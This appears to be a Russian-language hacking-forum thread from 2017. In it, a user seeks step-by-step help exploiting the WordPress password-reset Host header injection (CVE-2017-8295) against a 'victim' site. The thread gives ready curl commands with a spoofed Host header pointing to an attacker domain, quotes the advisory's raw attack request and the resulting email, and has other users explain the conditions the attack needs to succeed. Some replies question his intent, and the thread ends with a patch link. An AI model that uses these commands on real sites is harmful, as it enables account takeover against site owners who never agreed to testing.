Просмотр полной версии : Подскажите как воспользоваться уязвимостью Wordpress
itprepod
02.11.2017, 22:28
Всем привет.
Подскажите как воспользоваться уязвимостью Wordpress, описанной здесь:
https://wpvulndb.com/vulnerabilities/8807
я так понимаю, что это:
curl -H "Host: www.evil.com (http://www.evil.com)" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://example.com/wp-login.php?action=lostpassword
Команда для терминала в линукс?
Что должно быть вместо evil.com ?
вместо example.com сайт жертвы?
или наоборот?
Разъясните пожалуйста.
Всё верно. Команда вводится в терминал Linux, example.com - сайт жертвы. А вот что это за хост evil.com....
В хелпе curl сказано:
-H, --header LINE Передача пользовательского заголовка LINE на сервер (H)
M_script
03.11.2017, 07:01
itprepod said:
↑ (https://antichat.live/posts/4145684/)
Команда для терминала в линукс?
cURL кроссплатформенный
Вы вообще понимаете, что эта уязвимость дает и какой код должен быть на вашем сайте (evil.com) для проведения атаки?
itprepod
03.11.2017, 10:06
M_script said:
↑ (https://antichat.live/posts/4145752/)
cURL кроссплатформенный
Вы вообще понимаете, что эта уязвимость дает и какой код должен быть на вашем сайте (evil.com) для проведения атаки?
Я так понимаю, что с помощью этой уязвимости, можно получить письмо для генерации нового пароля от аккаунта сайта (не важно он с правами админа или нет) на свою почту.
Не знаю какой код должен быть на сайте вместо evil.com, поэтому я здесь.
M_script
04.11.2017, 03:00
itprepod said:
↑ (https://antichat.live/posts/4145771/)
Я так понимаю, что с помощью этой уязвимости, можно получить письмо для генерации нового пароля от аккаунта сайта (не важно он с правами админа или нет) на свою почту.
С первой попытки не угадали. Попробуйте еще раз.
itprepod said:
↑ (https://antichat.live/posts/4145771/)
Не знаю какой код должен быть на сайте вместо evil.com, поэтому я здесь.
То есть, ничего не знаете, но что-то хотите взломать? А знаете, какой срок дают за то, что вы собираетесь сделать?
brown said:
↑ (https://antichat.live/posts/4146064/)
работа по ру запрещена)
Это было указанно в описании к уязвимости?))
itprepod
04.11.2017, 18:57
M_script said:
↑ (https://antichat.live/posts/4146050/)
С первой попытки не угадали. Попробуйте еще раз.
То есть, ничего не знаете, но что-то хотите взломать? А знаете, какой срок дают за то, что вы собираетесь сделать?
Я в целях помочь админу в закрытии уязвимости, а не в целях навредить.
itprepod
06.11.2017, 02:19
M_script said:
↑ (https://antichat.live/posts/4146050/)
С первой попытки не угадали. Попробуйте еще раз.
Или с помощью этой уязвимости можно подменить email админа при заказе письма по восстановлению пароля?
Вот здесь:
https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
Показано, что письмо по восстановлению пароля приходит от wordpress@attackers-mxserver.com (mailto:wordpress@attackers-mxserver.com)
Вместо attackers-mxserver.com может быть любой другой домен.
Но перед атакой получается мне нужно создать почту на домене.
Порядок действий:
1. Регаю домен. Пусть будет forhackwp.ru
2. Делаю почту wordpress@forhackwp.ru (mailto:wordpress@forhackwp.ru)
3. Запускаю Линукс. Пишу в терминал:
curl -H "Host: forhackwp.ru" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://тут-домен-жертвы/wp-login.php?action=lostpassword (http://example.com/wp-login.php?action=lostpassword)
4. Жду письма на свою почту: wordpress@forhackwp.ru (mailto:wordpress@forhackwp.ru) ?
Или нет?
Вот тут:
https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
Написано (перевод):
Если злоумышленник отправляет запрос, аналогичный приведенному ниже WordPress по умолчанию
установка, доступная IP-адрес (IP-основе виртуального хоста):
-----[ HTTP Request ]----
POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
user_login=admin&redirect_to=&wp-submit=Get+New+Password
------------------------
WordPress будет вызвать функцию сброса пароля для учетной записи пользователя с правами администратора.
Из-за измененного заголовка узла имя_сервера будет присвоено значение
имя хоста по выбору злоумышленника.
В результате WordPress передаст следующие заголовки и текст сообщения электронной почты
/usr/bin / обертка sendmail:
------[ полученная электронная почта ]-----
Subject: [CompanyX WP] Password Reset
Return-Path:
From: WordPress
Message-ID:
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Someone requested that the password be reset for the following account:
http://companyX-wp/wp/wordpress/
Username: admin
If this was a mistake, just ignore this email and nothing will happen.
To reset your password, visit the following address:
"]http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>[/URL]
-------------------------------
Как сделать HTTP запрос?
itprepod said:
↑ (https://antichat.live/posts/4146227/)
Я в целях помочь админу в закрытии уязвимости, а не в целях навредить.
Совета по обновилению WP до последней версии, будет достаточно.
itprepod said:
↑ (https://antichat.live/posts/4146705/)
Или нет?
Нет. Письмо улетит админу, но в линках и заголовках будет домен атакующего.
Так же, должны быть соблюдены условия для успешной эксплуатации.
itprepod said:
↑ (https://antichat.live/posts/4146705/)
Как сделать HTTP запрос?
itprepod said:
↑ (https://antichat.live/posts/4146705/)
curl -H "Host: forhackwp.ru" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password"
http://тут-домен-жертвы/wp-login.php?action=lostpassword (http://example.com/wp-login.php?action=lostpassword)
itprepod
06.11.2017, 02:54
crlf said:
↑ (https://antichat.live/posts/4146711/)
curl -H "Host: forhackwp.ru" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password"
http://тут-домен-жертвы/wp-login.php?action=lostpassword (http://example.com/wp-login.php?action=lostpassword)
Сделал запрос. Пишет в терминале:
404 File not found.
Так и должно быть?
itprepod said:
↑ (https://antichat.live/posts/4146713/)
Так и должно быть?
Нет.
itprepod
06.11.2017, 03:04
crlf said:
↑ (https://antichat.live/posts/4146711/)
Совета по обновилению WP до последней версии, будет достаточно.
Нет. Письмо улетит админу, но в линках и заголовках будет домен атакующего.
Так же, должны быть соблюдены условия для успешной эксплуатации.
написал в личку
itprepod said:
↑ (https://antichat.live/posts/4146717/)
написал в личку
ответил
M_script
06.11.2017, 07:54
itprepod said:
↑ (https://antichat.live/posts/4146713/)
Так и должно быть?
Сайт должен быть доступен по IP. На хостингах и нормально настроенных серверах не сработает.
crlf said:
↑ (https://antichat.live/posts/4146711/)
Совета по обновилению WP до последней версии, будет достаточно.
Последняя версия 4.8.3. Она уязвима, если верить ссылке из первого поста.
itprepod
06.11.2017, 12:30
M_script said:
↑ (https://antichat.live/posts/4146737/)
Сайт должен быть доступен по IP. На хостингах и нормально настроенных серверах не сработает.
Да, сайт жертвы на хостинге, как и большинство сайтов по сути.
M_script said:
↑ (https://antichat.live/posts/4146737/)
Последняя версия 4.8.3. Она уязвима, если верить ссылке из первого поста.
Кстати, да. Кривым взлядом, принял патч за обновление Кому нужно, можете пропатчиться:
https://core.trac.wordpress.org/attachment/ticket/25239/CVE-2017-8295.patch
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot